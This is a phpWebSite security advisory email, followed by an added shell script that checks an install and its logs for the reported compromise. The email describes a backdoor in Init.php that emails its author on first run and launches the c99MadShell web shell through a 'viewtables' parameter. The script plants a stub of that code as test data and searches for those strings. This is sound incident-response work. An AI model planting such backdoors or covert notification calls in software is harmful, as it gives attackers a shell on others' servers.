Good day,
Here is a follow-up on the written by Jeff Tickle, our systems
administrator.
-------------------------------------------------------------------------
Long story short, upgrade to phpWebSite 1.6.1 from Sourceforge.
The exploit code in Init.php does the following:
1. See if ./files/writetest exists
2. If not, send an email to
dday.rabbit@... with your host name
and the script path, and create /files/writetest
3. If the GET variable 'viewtables' is set, execute c99MadShell.
c99MadShell is a php-based shell, more info here:
http://www.derekfountain.org/security_c99madshell.php

The attacker would have been restricted to the apache user. So, if you
are using suPHP, the damage won't be as bad, although they could still
upload files to a writable served path. The only way the attacker could
get root privileges is if the apache user could be used to find out
your root password somehow, like if your /etc/shadow file is world
readable or some such.
Things to check for:
1. The exploited code in core/class/Init.php around line 102
2. 'writetest' file under 'files' directory in each phpWebSite
installation
3. 'dday.rabbit@...' destination address in your email logs
4. 'viewtables' GET variable in your web server access logs
1 and 2 mean you have the exploit, 3 means the author was notified, and
4 means someone tried to use it.
I'll post more as I learn more...
-Jeff
--------------------------------------------------------------------------
--
Matthew McNaney
Electronic Student Services
Appalachian State University
Ext. 6493
http://ess.appstate.edu
http://phpwebsite.appstate.edu
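As an added example, not part of Jeff's or Matthew's mail and not phpWebSite code, here is a small POSIX shell checklist script that runs the four checks above against an install directory and its logs. It assumes the core/class/Init.php and files/writetest paths Jeff describes; the sample install, access log and mail log it builds in demo() are constructed for the demonstration, and NOTIFY_ADDR is a placeholder because the report only shows the address truncated.

```shell
#!/bin/sh
# Added example (not from the original mail): check the four indicators
# from the report. Sample data in demo() is constructed; NOTIFY_ADDR is a
# placeholder because the report shows the address truncated.

# Placeholder: replace with the full address from the report (only the
# local part 'dday.rabbit' is visible there).
NOTIFY_ADDR='dday.rabbit@REPLACE-WITH-REAL-DOMAIN'

# Indicator 4 pattern: 'viewtables' used as a query-string parameter.
VIEWTABLES_RE='[?&]viewtables='

# Indicators 1 and 2: strings from the report in core/class/Init.php and
# the files/writetest marker. The injected code itself is not reproduced in
# the report, so this is a plain string match (c99 may also hit innocuous
# text), not a signature. Returns the number of indicators found, 0 = none.
check_install() {
    dir="$1"
    found=0
    init="$dir/core/class/Init.php"
    if [ -f "$init" ] && grep -q -i -E 'writetest|viewtables|c99' "$init"; then
        echo "[!] $init contains strings from the reported injected code:"
        grep -n -i -E 'writetest|viewtables|c99' "$init"
        found=$((found + 1))
    fi
    if [ -e "$dir/files/writetest" ]; then
        echo "[!] $dir/files/writetest exists (marker the injected code creates)"
        found=$((found + 1))
    fi
    return "$found"
}

# Indicators 3 and 4: count lines in a log file matching a pattern.
# grep -c exits 1 on zero matches but still prints 0, so keep that 0.
count_log_hits() {
    grep -c -i -E "$2" "$1" || :
}

demo() {
    work=$(mktemp -d)
    mkdir -p "$work/site/core/class" "$work/site/files"
    # Constructed Init.php carrying the reported strings; a clean install
    # has none of them.
    printf '<?php\n// ... normal init code ...\nif (!file_exists("./files/writetest")) { mail("%s", "host", "path"); }\nif (isset($_GET["viewtables"])) { /* c99MadShell */ }\n' \
        "$NOTIFY_ADDR" > "$work/site/core/class/Init.php"
    : > "$work/site/files/writetest"
    # Constructed access log and mail log lines.
    printf '%s\n' \
      '10.0.0.5 - - [01/Jan/2009:10:00:00 +0000] "GET /index.php?viewtables=1 HTTP/1.1" 200 512' \
      '10.0.0.6 - - [01/Jan/2009:10:01:00 +0000] "GET /index.php?module=users HTTP/1.1" 200 2048' \
      > "$work/access.log"
    printf '%s\n' \
      "Jan  1 10:00:01 www sendmail[123]: to=<$NOTIFY_ADDR>, stat=Sent" \
      'Jan  1 10:02:00 www sendmail[124]: to=<admin@localhost>, stat=Sent' \
      > "$work/maillog"

    n=0; check_install "$work/site" || n=$?
    echo "install: $n indicator(s) found"
    echo "mail log lines to notification address: $(count_log_hits "$work/maillog" "$NOTIFY_ADDR")"
    echo "access log requests with viewtables=: $(count_log_hits "$work/access.log" "$VIEWTABLES_RE")"
    rm -rf "$work"
}

demo
```

Run it once per phpWebSite install root (the directory holding core/ and files/) and point count_log_hits at the real mail and access logs; a non-zero return from check_install means the exploit is present, a mail-log hit means the author was notified, and an access-log hit means someone tried to use it, exactly the reading Jeff gives for indicators 1 through 4.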